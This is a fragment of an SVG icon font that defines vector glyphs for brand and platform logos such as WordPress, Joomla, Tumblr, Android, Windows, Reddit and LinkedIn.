<glyph unicode="&#xef00;" glyph-name="wordpress" d="M128 448.008c0-148.026 88.322-275.968 216.43-336.578l-183.178 488.784c-21.308-46.508-33.252-97.982-33.252-152.206zM771.228 466.872c0 46.234-17.054 78.236-31.654 103.142-19.458 30.82-37.72 56.894-37.72 87.716 0 34.374 26.766 66.376 64.486 66.376 1.704 0 3.32-0.204 4.976-0.302-68.316 60.97-159.34 98.196-259.308 98.196-134.16 0-252.186-67.046-320.844-168.568 9.010-0.282 17.506-0.454 24.712-0.454 40.154 0 102.34 4.752 102.34 4.752 20.69 1.182 23.132-28.434 2.458-30.822 0 0-20.81-2.368-43.952-3.55l139.834-405.106 84.044 245.456-59.822 159.65c-20.688 1.184-40.278 3.55-40.278 3.55-20.702 1.192-18.272 32.002 2.438 30.822 0 0 63.4-4.752 101.134-4.752 40.146 0 102.35 4.752 102.35 4.752 20.702 1.182 23.14-28.434 2.446-30.822 0 0-20.834-2.372-43.948-3.55l138.78-402.018 38.312 124.632c16.58 51.75 29.216 88.9 29.216 120.9zM518.742 415.296l-115.226-326.058c34.416-9.858 70.794-15.238 108.488-15.238 44.716 0 87.604 7.518 127.518 21.2-1.018 1.602-1.974 3.304-2.75 5.154l-118.030 314.942zM848.962 627.428c1.652-11.91 2.588-24.686 2.588-38.458 0-37.93-7.292-80.596-29.202-133.95l-117.286-330.272c114.162 64.828 190.938 185.288 190.938 323.258 0 65.030-17.060 126.16-47.038 179.422zM512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 0c-247.424 0-448 200.576-448 448s200.576 448 448 448 448-200.576 448-448-200.576-448-448-448z" />
<glyph unicode="&#xef01;" glyph-name="joomla" d="M266.004 683.322c32.832 32.844 86.002 32.844 118.804 0.032l7.826-7.868 101.104 101.156-7.874 7.88c-57.624 57.7-138.514 77.878-212.42 60.522-10.594 65.182-67.088 114.924-135.174 114.956-75.65 0-136.954-61.442-136.97-137.158 0-65.336 45.59-120 106.662-133.83-23.138-77.45-4.242-164.834 56.846-225.984l227.826-227.9 100.996 101.214-227.81 227.886c-32.682 32.722-32.742 86.126 0.184 119.094zM1022.712 822.842c0.016 75.762-61.318 137.158-136.984 137.158-69.234 0-126.478-51.444-135.682-118.238-77.074 22.664-163.784 3.496-224.64-57.408l-227.84-227.9 101.102-101.172 227.766 227.856c32.94 32.966 85.988 32.906 118.684 0.184 32.8-32.83 32.8-86.114-0.032-118.956l-7.794-7.836 101.010-101.248 7.858 7.928c60.458 60.566 79.678 146.756 57.612 223.638 67.15 8.834 118.94 66.364 118.94 135.994zM906.266 208.936c18.102 74.458-1.976 156.324-60.108 214.5l-227.49 227.992-101.102-101.122 227.52-228.012c32.94-32.996 32.864-86.096 0.184-118.848-32.802-32.814-86.004-32.814-118.836 0.030l-7.766 7.79-100.994-101.246 7.732-7.728c61.516-61.594 149.618-80.438 227.368-56.488 12.632-62.682 67.934-109.804 134.258-109.804 75.604 0 136.968 61.35 136.968 137.126 0 69.2-51.18 126.456-117.734 135.81zM612.344 431.316l-227.536-227.992c-32.71-32.768-86.034-32.828-118.944 0.124-32.818 32.904-32.832 86.098-0.044 118.97l7.808 7.774-101.086 101.124-7.734-7.712c-58.76-58.802-78.56-141.834-59.45-216.982-60.398-14.26-105.358-68.634-105.358-133.496-0.016-75.746 61.332-137.126 136.982-137.126 65.1 0.032 119.588 45.418 133.54 106.382 74.702-18.552 156.998 1.304 215.344 59.756l227.49 227.96-101.012 101.218z" />
<glyph unicode="&#xef02;" glyph-name="ello" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM824.636 370.402c-36.798-142.716-165.358-242.402-312.63-242.402-147.282 0-275.85 99.686-312.654 242.42-6.232 24.158 8.352 48.886 32.512 55.124 3.71 0.958 7.528 1.446 11.338 1.446 20.624 0 38.628-13.972 43.788-33.976 26.512-102.748 119.042-174.51 225.014-174.51 105.978 0 198.502 71.76 225 174.51 5.152 20.006 23.15 33.982 43.766 33.982 3.822 0 7.65-0.49 11.376-1.456 11.692-3.016 21.526-10.418 27.668-20.842 6.142-10.416 7.854-22.596 4.822-34.296z" />
<glyph unicode="&#xef03;" glyph-name="blogger" d="M957.796 576h-57.406c-35.166 0-65.988 29.742-68.39 64v0c0.004 182.668-147.258 320-331.19 320h-167.824c-183.812 0-332.856-148-332.986-330.666v-362.798c0-182.654 149.174-330.536 332.984-330.536h358.42c183.948 0 332.596 147.882 332.596 330.536v234.382c0 36.502-29.44 75.082-66.204 75.082zM320 704h192c35.2 0 64-28.8 64-64s-28.8-64-64-64h-192c-35.2 0-64 28.8-64 64s28.8 64 64 64zM704 192h-384c-35.2 0-64 28.8-64 64s28.8 64 64 64h384c35.2 0 64-28.8 64-64s-28.8-64-64-64z" />
<glyph unicode="&#xef04;" glyph-name="blogger2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM896 312c0-137-111.4-248-249.4-248h-268.8c-138 0-249.8 111-249.8 248v272c0 137 111.8 248 249.8 248h125.8c138 0 248.4-103 248.4-240 1.8-25.6 25-48 51.2-48h43c27.6 0 49.6-29 49.6-56.4v-175.6zM704 320c0-35.2-28.8-64-64-64h-256c-35.2 0-64 28.8-64 64v0c0 35.2 28.8 64 64 64h256c35.2 0 64-28.8 64-64v0zM576 576c0-35.2-28.8-64-64-64h-128c-35.2 0-64 28.8-64 64v0c0 35.2 28.8 64 64 64h128c35.2 0 64-28.8 64-64v0z" />
<glyph unicode="&#xef05;" glyph-name="tumblr" d="M576.032 512l-0.002-234.184c0-59.418-0.77-93.656 5.53-110.5 6.25-16.754 21.918-34.146 38.99-44.202 22.684-13.588 48.542-20.376 77.708-20.376 51.854 0 82.478 6.848 133.742 40.54v-153.944c-43.7-20.552-81.866-32.594-117.324-40.922-35.5-8.242-73.86-12.406-115.064-12.406-46.828 0-74.456 5.886-110.41 17.656-35.958 11.868-66.66 28.806-92.020 50.54-25.45 21.922-43.022 45.208-52.848 69.832-9.826 24.636-14.716 60.414-14.716 107.244v359.1h-137.426v145.006c40.208 13.042 85.164 31.788 113.78 56.152 28.754 24.45 51.766 53.706 69.106 87.944 17.392 34.146 29.348 77.712 35.872 130.516h165.084l-0.002-255.996h255.968v-192h-255.968z" />
<glyph unicode="&#xef06;" glyph-name="tumblr2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM731.8 135.4c-30.2-14.2-57.6-24.2-82-30-24.4-5.6-51-8.6-79.4-8.6-32.4 0-51.4 4-76.2 12.2s-46 19.8-63.6 34.8c-17.6 15.2-29.6 31.2-36.4 48.2s-10.2 41.6-10.2 74v247.8h-96v100c27.8 9 60 22 79.6 38.8 19.8 16.8 35.8 37 47.6 60.6 12 23.6 20.2 53.6 24.8 90h100.4v-163.2h163.6v-126.2h-163.4v-181.2c0-41-0.6-64.6 3.8-76.2s15.2-23.6 27-30.4c15.6-9.4 33.6-14 53.6-14 35.8 0 71.4 11.6 106.8 34.8v-111.4z" />
<glyph unicode="&#xef07;" glyph-name="yahoo" d="M568.2 371v0c112.6 197.6 298.6 520 349.6 589-22.4-15-56.8-22.6-88.4-29.8l-47.8 29.8c-38.4-71.6-180-303-270.2-451.2-91.4 151.4-199.6 326.2-270.2 451.2-56-12-79.2-12.6-135 0v0 0c0 0 0 0 0 0v0c110.8-166.8 288.2-484.6 348.6-589v0l-8.2-435 64.8 29.8v0.8l64.8-30.6-8 435z" />
<glyph unicode="&#xef08;" glyph-name="yahoo2" d="M513.2 890.4c-181 0-352 23.8-513.2 69.6 0-361.8 0-933.2 0-1024 161.4 45.8 332.4 69.6 513.2 69.6 178.8 0 349.4-23.2 510.8-69.6 0 348.4 0 649.8 0 1024-161.4-46.4-331.8-69.6-510.8-69.6zM796.8 803l-6.2-9.8c-5.8-9.2-11-17-18.2-28-9.6-14.4-27.6-43-49.2-79.8-6-10.2-13.4-22.4-21-35.6-14.6-24.6-31-52.4-44-74.4-5.4-9.4-10.8-19-16.4-28.6-14.4-25-29.2-50.8-43.4-75.6-14.6-25.8-29-51.2-43.4-76.4v-25.4c0-35.2 0.8-73.6 2-107.8 0.6-15.6 1.2-43.4 2-72.8 0.8-35 1.6-71.2 2.6-89.6l0.2-5.6v-0.6l-6 1.6c-2.4 0.6-4.6 1.2-7 1.8-7.2 1.6-15 2.8-22.6 3.6-4.6 0.4-9.4 0.6-14.2 0.6 0 0 0 0 0 0s0 0 0 0c-4.8 0-9.6-0.2-14.2-0.6-7.6-0.8-15.4-2-22.6-3.6-2.4-0.6-4.8-1.2-7-1.8l-6-1.6v0.6l0.2 5.6c0.8 18.2 1.8 54.6 2.6 89.6 0.6 29.4 1.4 57.2 2 72.8 1.4 34.4 2 72.6 2 107.8v25.4c-14.4 25.4-28.8 50.6-43.4 76.4-14.2 25-29 50.6-43.2 75.6-5.6 9.6-11 19.2-16.4 28.6-12.8 22.2-29.4 50-44 74.4-7.8 13-15.2 25.4-21 35.6-21.6 36.8-39.6 65.2-49.2 79.8-7.2 11-12.4 18.8-18.2 28l-6.2 9.8 11.2-3.2c14.2-4 28.8-6 44.4-6s30.6 2 44.6 6l3.4 1 1.8-3c27.6-49.8 101.8-171.8 146.2-244.8 15.2-25.2 27.4-45 33.4-55.2 0 0 0 0 0 0.2 0 0 0 0 0-0.2 6 10 18.2 30 33.4 55.2 44.4 72.8 118.6 194.8 146.2 244.8l1.8 3 3.4-1c14-4 29-6 44.6-6s30.2 2 44.4 6l10.6 3.2z" />
<glyph unicode="&#xef09;" glyph-name="tux" d="M567.656 223.084c-81.944-38.118-158.158-37.716-209.34-34.020-61.052 4.41-110.158 21.124-131.742 35.732-13.3 9.006-31.384 5.522-40.39-7.782-9.004-13.302-5.52-31.386 7.782-40.39 34.698-23.486 96.068-40.954 160.162-45.58 10.866-0.784 22.798-1.278 35.646-1.278 55.782 0 126.626 5.316 202.42 40.57 14.564 6.778 20.878 24.074 14.104 38.64-6.776 14.566-24.076 20.872-38.642 14.108zM890.948 266.184c2.786 252.688 28.762 730.206-454.97 691.612-477.6-38.442-350.964-542.968-358.082-711.95-6.308-89.386-35.978-198.648-77.896-309.846h129.1c13.266 47.122 23.024 93.72 27.232 138.15 7.782-5.428 16.108-10.674 24.994-15.7 14.458-8.518 26.884-19.844 40.040-31.834 30.744-28.018 65.59-59.774 133.712-63.752 4.572-0.262 9.174-0.394 13.676-0.394 68.896 0 116.014 30.154 153.878 54.382 18.14 11.612 33.818 21.64 48.564 26.452 41.91 13.12 78.532 34.296 105.904 61.252 4.276 4.208 8.242 8.538 11.962 12.948 15.246-55.878 36.118-118.758 59.288-181.504h275.65c-66.174 102.224-134.436 202.374-133.052 330.184zM124.11 403.648c0 0.016 0 0.030-0.002 0.046-4.746 82.462 34.71 151.832 88.126 154.936 53.412 3.106 100.56-61.228 105.304-143.692 0-0.014 0.004-0.030 0.004-0.044 0.256-4.446 0.368-8.846 0.37-13.206-16.924-4.256-32.192-10.436-45.872-17.63-0.052 0.612-0.092 1.216-0.152 1.83 0 0.008 0 0.018 0 0.026-4.57 46.81-29.572 82.16-55.852 78.958-26.28-3.204-43.88-43.75-39.312-90.558 0-0.010 0.004-0.018 0.004-0.026 1.992-20.408 7.868-38.636 16.042-52.444-2.034-1.604-7.784-5.812-14.406-10.656-4.97-3.634-11.020-8.058-18.314-13.43-19.882 26.094-33.506 63.58-35.94 105.89zM665.26 199.822c-1.9-43.586-58.908-84.592-111.582-101.044l-0.296-0.096c-21.9-7.102-41.428-19.6-62.104-32.83-34.732-22.224-70.646-45.208-122.522-45.208-3.404 0-6.894 0.104-10.326 0.296-47.516 2.778-69.742 23.032-97.88 48.676-14.842 13.526-30.19 27.514-49.976 39.124l-0.424 0.244c-42.706 24.104-69.212 54.082-70.908 80.194-0.842 12.98 4.938 24.218 17.182 33.4 26.636 19.972 44.478 33.022 56.284 41.658 13.11 9.588 17.068 12.48 20 15.264 2.096 1.986 4.364 4.188 6.804 6.562 24.446 23.774 65.36 63.562 128.15 63.562 38.404 0 80.898-14.8 126.17-43.902 21.324-13.878 39.882-20.286 63.38-28.4 16.156-5.578 34.468-11.902 58.992-22.404l0.396-0.164c22.88-9.404 49.896-26.564 48.66-54.932zM652.646 302.194c-4.4 2.214-8.974 4.32-13.744 6.286-22.106 9.456-39.832 15.874-54.534 20.998 8.116 15.894 13.16 35.72 13.624 57.242 0 0.010 0 0.022 0 0.030 1.126 52.374-25.288 94.896-58.996 94.976-33.71 0.078-61.95-42.314-63.076-94.686 0-0.010 0-0.018 0-0.028-0.038-1.714-0.042-3.416-0.020-5.11-20.762 9.552-41.18 16.49-61.166 20.76-0.092 1.968-0.204 3.932-0.244 5.92 0 0.016 0 0.036 0 0.050-1.938 95.412 56.602 174.39 130.754 176.402 74.15 2.014 135.828-73.7 137.772-169.11 0-0.018 0-0.038 0-0.052 0.874-43.146-10.66-82.866-30.37-113.678z" />
<glyph unicode="&#xef0a;" glyph-name="appleinc" d="M791.498 415.908c-1.294 129.682 105.758 191.876 110.542 194.966-60.152 88.020-153.85 100.078-187.242 101.472-79.742 8.074-155.596-46.948-196.066-46.948-40.368 0-102.818 45.754-168.952 44.552-86.916-1.292-167.058-50.538-211.812-128.38-90.304-156.698-23.126-388.84 64.89-515.926 43.008-62.204 94.292-132.076 161.626-129.58 64.842 2.588 89.362 41.958 167.756 41.958s100.428-41.958 169.050-40.67c69.774 1.296 113.982 63.398 156.692 125.796 49.39 72.168 69.726 142.038 70.924 145.626-1.548 0.706-136.060 52.236-137.408 207.134zM662.562 796.478c35.738 43.358 59.86 103.512 53.28 163.522-51.478-2.096-113.878-34.29-150.81-77.55-33.142-38.376-62.148-99.626-54.374-158.436 57.466-4.484 116.128 29.204 151.904 72.464z" />
<glyph unicode="&#xef0b;" glyph-name="finder" d="M569.226 181.744c-0.002 0.044-0.002 0.088-0.004 0.132 0.002-0.044 0.002-0.088 0.004-0.132zM570.596 145.462c-0.012 0.234-0.022 0.466-0.032 0.702 0.010-0.234 0.020-0.466 0.032-0.702zM569.814 163.688c-0.006 0.178-0.012 0.356-0.020 0.536 0.010-0.182 0.016-0.358 0.020-0.536zM960 960h-896c-35.2 0-64-28.8-64-64v-896c0-35.2 28.8-64 64-64h493.832c0.044 0 0.088-0.006 0.132-0.006 0.042 0 0.084 0.006 0.126 0.006h401.91c35.2 0 64 28.8 64 64v896c0 35.2-28.8 64-64 64zM192 736c0 17.672 14.328 32 32 32s32-14.328 32-32v-64c0-17.672-14.328-32-32-32s-32 14.328-32 32v64zM960 0h-375.058c-6.7 42.082-10.906 85.476-13.388 127.604 0.006-0.116 0.010-0.228 0.018-0.344-19.696-2.146-39.578-3.26-59.572-3.26-133.65 0-262.382 48.656-362.484 137.006-14.906 13.156-16.326 35.906-3.168 50.812 13.158 14.904 35.906 16.326 50.814 3.168 86.936-76.728 198.748-118.986 314.838-118.986 19.086 0 38.052 1.166 56.816 3.416-2.192 118.194 6.876 211.914 7.026 213.404 0.898 8.996-2.050 17.952-8.118 24.654-6.066 6.702-14.682 10.526-23.724 10.526h-95.174c1.384 34.614 5.082 93.814 14.958 160.188 18.864 126.76 51.994 225.77 96.152 287.812h400.064v-896zM800 640c-17.674 0-32 14.328-32 32v64c0 17.672 14.326 32 32 32s32-14.328 32-32v-64c0-17.672-14.326-32-32-32zM540.496 124.768c-3.646-0.192-7.298-0.336-10.956-0.454 3.658 0.116 7.31 0.264 10.956 0.454zM512 124c4.692 0 9.374 0.074 14.050 0.196-4.676-0.122-9.358-0.196-14.050-0.196zM539.074 196.798c0.784 0.044 1.568 0.084 2.352 0.132-0.782-0.048-1.568-0.088-2.352-0.132zM525.084 196.2c1.074 0.030 2.146 0.072 3.218 0.11-1.072-0.038-2.144-0.082-3.218-0.11zM877.65 311.818c-13.156 14.91-35.908 16.322-50.812 3.168-72.642-64.114-162.658-104.136-258.022-115.57 0.43-23.278 1.294-47.496 2.754-72.156 111.954 12.21 217.786 58.614 302.912 133.746 14.908 13.156 16.326 35.906 3.168 50.812zM571.498 127.252c-4.606-0.5-9.222-0.936-13.848-1.322 4.626 0.384 9.244 0.822 13.848 1.322zM555.488 125.758c-3.906-0.312-7.822-0.576-11.742-0.806 3.92 0.226 7.834 0.496 11.742 0.806z" />
<glyph unicode="&#xef0c;" glyph-name="android" d="M896 576c-35.2 0-64-28.8-64-64v-256c0-35.2 28.8-64 64-64s64 28.8 64 64v256c0 35.2-28.8 64-64 64zM128 576c-35.2 0-64-28.8-64-64v-256c0-35.2 28.8-64 64-64s64 28.8 64 64v256c0 35.2-28.802 64-64 64zM224 224c0-53.020 42.98-96 96-96v0-128c0-35.2 28.8-64 64-64s64 28.8 64 64v128h128v-128c0-35.2 28.8-64 64-64s64 28.8 64 64v128c53.020 0 96 42.98 96 96v352h-576v-352zM798.216 639.998c-9.716 87.884-59.004 163.792-129.62 209.646l32.024 64.046c7.904 15.806 1.496 35.028-14.31 42.932s-35.030 1.496-42.932-14.312l-32.142-64.286-8.35 3.316c-28.568 9.502-59.122 14.66-90.886 14.66-31.762 0-62.316-5.158-90.888-14.656l-8.348-3.316-32.142 64.282c-7.904 15.808-27.128 22.212-42.932 14.312-15.808-7.904-22.214-27.126-14.312-42.932l32.022-64.046c-70.616-45.852-119.904-121.762-129.622-209.644v-32h574.222v31.998h-1.784zM416 704c-17.674 0-32 14.328-32 32 0 17.648 14.288 31.958 31.93 31.996 0.032 0 0.062-0.002 0.094-0.002 0.018 0 0.036 0.002 0.052 0.002 17.638-0.042 31.924-14.35 31.924-31.996 0-17.672-14.326-32-32-32zM608 704c-17.674 0-32 14.328-32 32 0 17.646 14.286 31.954 31.924 31.996 0.016 0 0.034-0.002 0.050-0.002 0.032 0 0.064 0.002 0.096 0.002 17.64-0.038 31.93-14.348 31.93-31.996 0-17.672-14.326-32-32-32z" />
<glyph unicode="&#xef0d;" glyph-name="windows" d="M412.23 448.086c-47.708 24.518-94.086 36.958-137.88 36.958-5.956 0-11.952-0.18-17.948-0.708-55.88-4.624-106.922-19.368-139.75-30.828-8.708-3.198-17.634-6.576-26.83-10.306l-89.822-311.394c61.702 22.832 116.292 33.938 166.27 33.938 80.846 0 139.528-30.208 187.992-61.304 22.962 77.918 78.044 266.090 94.482 322.324-11.95 7.284-24.076 14.57-36.514 21.32zM528.348 368.93l-90.446-314.148c26.832-15.372 117.098-64.050 186.212-64.050 55.792 0 118.252 14.296 190.834 43.792l86.356 301.976c-58.632-18.922-114.876-28.52-167.464-28.52-95.95 0-163.114 31.098-205.492 60.95zM292.822 591.21c77.118-0.798 134.152-30.208 181.416-60.502l92.752 317.344c-19.546 11.196-70.806 39.094-107.858 48.6-24.386 5.684-50.020 8.616-77.204 8.616-51.796-0.976-108.388-13.946-172.888-39.8l-88.44-310.596c64.808 24.436 120.644 36.34 172.086 36.34 0.046-0.002 0.136-0.002 0.136-0.002zM1024 761.876c-58.814-22.832-116.208-34.466-171.028-34.466-91.686 0-159.292 31.802-203.094 62.366l-91.95-318.236c61.746-39.708 128.29-59.878 198.122-59.878 56.948 0 115.94 13.68 175.462 40.688l-0.182 2.222 3.734 0.886 88.936 306.418z" />
<glyph unicode="&#xef0e;" glyph-name="windows8" d="M0.35 448l-0.35 312.074 384 52.144v-364.218zM448 821.518l511.872 74.482v-448h-511.872zM959.998 384l-0.126-448-511.872 72.016v375.984zM384 16.164l-383.688 52.594-0.020 315.242h383.708z" />
<glyph unicode="&#xef0f;" glyph-name="soundcloud" d="M891.96 445.796c-18.086 0-35.348-3.52-51.064-9.856-10.506 114.358-110.29 204.060-232 204.060-29.786 0-58.682-5.63-84.318-15.164-9.96-3.702-12.578-7.52-12.578-14.916v-402.714c0-7.766 6.24-14.234 14.124-14.996 0.336-0.034 363.536-0.21 365.89-0.21 72.904 0 131.986 56.816 131.986 126.894s-59.134 126.902-132.040 126.902zM400 192h32l16 224.22-16 223.78h-32l-16-223.78zM304 192h-32l-16 162.75 16 157.25h32l16-160zM144 192h32l16 128-16 128h-32l-16-128zM16 256h32l16 64-16 64h-32l-16-64z" />
<glyph unicode="&#xef10;" glyph-name="soundcloud2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM176 256h-32l-16 96 16 96h32l16-96-16-96zM304 256h-32l-16 128 16 128h32l16-128-16-128zM432 256h-32l-16 192 16 192h32l16-192-16-192zM825.2 256c-2 0-301.2 0.2-301.4 0.2-6.4 0.6-11.6 6.2-11.8 12.8v345.2c0 6.4 2.2 9.6 10.4 12.8 21.2 8.2 45 13 69.6 13 100.2 0 182.4-76.8 191.2-175 13 5.4 27.2 8.4 42 8.4 60 0 108.8-48.8 108.8-108.8s-48.8-108.6-108.8-108.6z" />
<glyph unicode="&#xef11;" glyph-name="skype" d="M425.6 922.6c-1.6 1-3.4 1.8-5 2.6-1.8-0.4-3.4-0.6-5.2-1l10.2-1.6zM36.8 539c-0.4-1.8-0.6-3.6-0.8-5.2 1-1.6 1.6-3.2 2.6-4.8l-1.8 10zM986.8 357.4c0.4 1.8 0.6 3.6 1 5.4-1 1.6-1.6 3.2-2.6 4.8l1.6-10.2zM592-23c1.6-1 3.4-1.8 5-2.6 1.8 0.4 3.6 0.6 5.4 0.8l-10.4 1.8zM987.8 362.8c-0.4-1.8-0.6-3.6-1-5.4l-1.8 10.4c1-1.8 1.8-3.4 2.8-5 5.2 28.8 8 58.2 8 87.6 0 65.2-12.8 128.6-38 188.2-24.4 57.6-59.2 109.4-103.6 153.8s-96.2 79.2-153.6 103.6c-59.6 25.2-123 38-188.2 38-30.8 0-61.6-2.8-91.6-8.6 0 0-0.2 0-0.2 0 1.6-0.8 3.4-1.6 5-2.6l-10.2 1.6c1.8 0.4 3.4 0.6 5.2 1-41.2 21.8-87.4 33.6-134.2 33.6-76.4 0-148.4-29.8-202.4-83.8s-83.8-126-83.8-202.4c0-48.6 12.6-96.6 36-138.8 0.4 1.8 0.6 3.6 0.8 5.2l1.8-10.2c-1 1.6-1.8 3.2-2.6 4.8-4.8-27.4-7.2-55.4-7.2-83.4 0-65.2 12.8-128.6 38-188.2 24.4-57.6 59.2-109.2 103.6-153.6s96.2-79.2 153.8-103.6c59.6-25.2 123-38 188.2-38 28.4 0 56.8 2.6 84.6 7.6-1.6 1-3.2 1.8-5 2.6l10.4-1.8c-1.8-0.4-3.6-0.6-5.4-0.8 42.8-24.2 91.4-37.2 140.8-37.2 76.4 0 148.4 29.8 202.4 83.8s83.8 126 83.8 202.4c-0.2 48.6-12.8 96.6-36.4 139.2zM514.2 154.2c-171.8 0-248.6 84.4-248.6 147.8 0 32.4 24 55.2 57 55.2 73.6 0 54.4-105.6 191.6-105.6 70.2 0 109 38.2 109 77.2 0 23.4-11.6 49.4-57.8 60.8l-152.8 38.2c-123 30.8-145.4 97.4-145.4 160 0 129.8 122.2 178.6 237 178.6 105.8 0 230.4-58.4 230.4-136.4 0-33.4-29-52.8-62-52.8-62.8 0-51.2 86.8-177.6 86.8-62.8 0-97.4-28.4-97.4-69s49.6-53.6 92.6-63.4l113.2-25.2c123.8-27.6 155.2-100 155.2-168 0-105.4-81-184.2-244.4-184.2z" />
<glyph unicode="&#xef12;" glyph-name="reddit" d="M256 320c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM640 320c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM643.112 183.222c16.482 12.986 40.376 10.154 53.364-6.332s10.152-40.378-6.334-53.366c-45.896-36.158-115.822-59.524-178.142-59.524-62.322 0-132.248 23.366-178.144 59.522-16.486 12.99-19.32 36.882-6.332 53.368 12.99 16.482 36.882 19.318 53.366 6.332 26.422-20.818 78.722-43.222 131.11-43.222s104.688 22.404 131.112 43.222zM1024 448c0 70.692-57.308 128-128 128-48.116 0-89.992-26.57-111.852-65.82-65.792 35.994-145.952 59.246-233.28 64.608l76.382 171.526 146.194-42.2c13.152-37.342 48.718-64.114 90.556-64.114 53.020 0 96 42.98 96 96s-42.98 96-96 96c-36.56 0-68.342-20.442-84.554-50.514l-162.906 47.024c-18.224 5.258-37.538-3.722-45.252-21.052l-103.77-233.026c-85.138-5.996-163.262-29.022-227.636-64.236-21.864 39.25-63.766 65.804-111.882 65.804-70.692 0-128-57.308-128-128 0-52.312 31.402-97.254 76.372-117.102-8.070-24.028-12.372-49.104-12.372-74.898 0-176.73 200.576-320 448-320 247.422 0 448 143.27 448 320 0 25.792-4.3 50.862-12.368 74.886 44.97 19.85 76.368 64.802 76.368 117.114zM864 772c19.882 0 36-16.118 36-36s-16.118-36-36-36-36 16.118-36 36 16.118 36 36 36zM64 448c0 35.29 28.71 64 64 64 25.508 0 47.572-15.004 57.846-36.646-33.448-25.366-61.166-54.626-81.666-86.738-23.524 9.47-40.18 32.512-40.18 59.384zM512 12c-205.45 0-372 109.242-372 244s166.55 244 372 244c205.45 0 372-109.242 372-244s-166.55-244-372-244zM919.82 388.616c-20.5 32.112-48.218 61.372-81.666 86.738 10.276 21.642 32.338 36.646 57.846 36.646 35.29 0 64-28.71 64-64 0-26.872-16.656-49.914-40.18-59.384z" />
<glyph unicode="&#xef13;" glyph-name="hackernews" d="M0 960v-1024h1024v1024h-1024zM544 376v-216h-64v216l-175 328h72.6l134.4-252 134.4 252h72.6l-175-328z" />
<glyph unicode="&#xef14;" glyph-name="wikipedia" d="M966.8 726.4c0-3.2-1-6.2-3-9-2-2.6-4.2-4-6.8-4-20-2-36.4-8.4-49-19.2-12.8-10.8-25.8-31.8-39.2-62.4l-206.4-465.4c-1.4-4.4-5.2-6.4-11.4-6.4-4.8 0-8.6 2.2-11.4 6.4l-115.8 242-133.2-242c-2.8-4.4-6.4-6.4-11.4-6.4-6 0-9.8 2.2-11.8 6.4l-202.6 465.2c-12.6 28.8-26 49-40 60.4s-33.6 18.6-58.6 21.2c-2.2 0-4.2 1.2-6 3.4-2 2.2-2.8 4.8-2.8 7.8 0 7.6 2.2 11.4 6.4 11.4 18 0 37-0.8 56.8-2.4 18.4-1.6 35.6-2.4 51.8-2.4 16.4 0 36 0.8 58.4 2.4 23.4 1.6 44.2 2.4 62.4 2.4 4.4 0 6.4-3.8 6.4-11.4s-1.4-11.2-4-11.2c-18-1.4-32.4-6-42.8-13.8s-15.6-18-15.6-30.8c0-6.4 2.2-14.6 6.4-24.2l167.4-378.4 95.2 179.6-88.6 185.8c-16 33.2-29 54.6-39.2 64.2s-25.8 15.4-46.6 17.6c-2 0-3.6 1.2-5.4 3.4s-2.6 4.8-2.6 7.8c0 7.6 1.8 11.4 5.6 11.4 18 0 34.6-0.8 49.8-2.4 14.6-1.6 30-2.4 46.6-2.4 16.2 0 33.2 0.8 51.4 2.4 18.6 1.6 37 2.4 55 2.4 4.4 0 6.4-3.8 6.4-11.4s-1.2-11.2-4-11.2c-36.2-2.4-54.2-12.8-54.2-30.8 0-8 4.2-20.6 12.6-37.6l58.6-119 58.4 108.8c8 15.4 12.2 28.4 12.2 38.8 0 24.8-18 38-54.2 39.6-3.2 0-4.8 3.8-4.8 11.2 0 2.8 0.8 5.2 2.4 7.6s3.2 3.6 4.8 3.6c13 0 28.8-0.8 47.8-2.4 18-1.6 33-2.4 44.6-2.4 8.4 0 20.6 0.8 36.8 2 20.4 1.8 37.6 2.8 51.4 2.8 3.2 0 4.8-3.2 4.8-9.6 0-8.6-3-13-8.8-13-21-2.2-38-8-50.8-17.4s-28.8-30.8-48-64.4l-78.2-143.2 105.2-214.4 155.4 361.4c5.4 13.2 8 25.4 8 36.4 0 26.4-18 40.4-54.2 42.2-3.2 0-4.8 3.8-4.8 11.2 0 7.6 2.4 11.4 7.2 11.4 13.2 0 28.8-0.8 47-2.4 16.8-1.6 30.8-2.4 42-2.4 12 0 25.6 0.8 41.2 2.4 16.2 1.6 30.8 2.4 43.8 2.4 4 0 6-3.2 6-9.6z" />
<glyph unicode="&#xef15;" glyph-name="linkedin" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM384 128h-128v448h128v-448zM320 640c-35.4 0-64 28.6-64 64s28.6 64 64 64c35.4 0 64-28.6 64-64s-28.6-64-64-64zM832 128h-128v256c0 35.4-28.6 64-64 64s-64-28.6-64-64v-256h-128v448h128v-79.4c26.4 36.2 66.8 79.4 112 79.4 79.6 0 144-71.6 144-160v-288z" />
<glyph unicode="&#xef16;" glyph-name="linkedin2" d="M384 576h177.106v-90.782h2.532c24.64 44.194 84.958 90.782 174.842 90.782 186.946 0 221.52-116.376 221.52-267.734v-308.266h-184.61v273.278c0 65.184-1.334 149.026-96.028 149.026-96.148 0-110.82-70.986-110.82-144.292v-278.012h-184.542v576zM64 576h192v-576h-192v576zM256 736c0-53.019-42.981-96-96-96s-96 42.981-96 96c0 53.019 42.981 96 96 96s96-42.981 96-96z" />
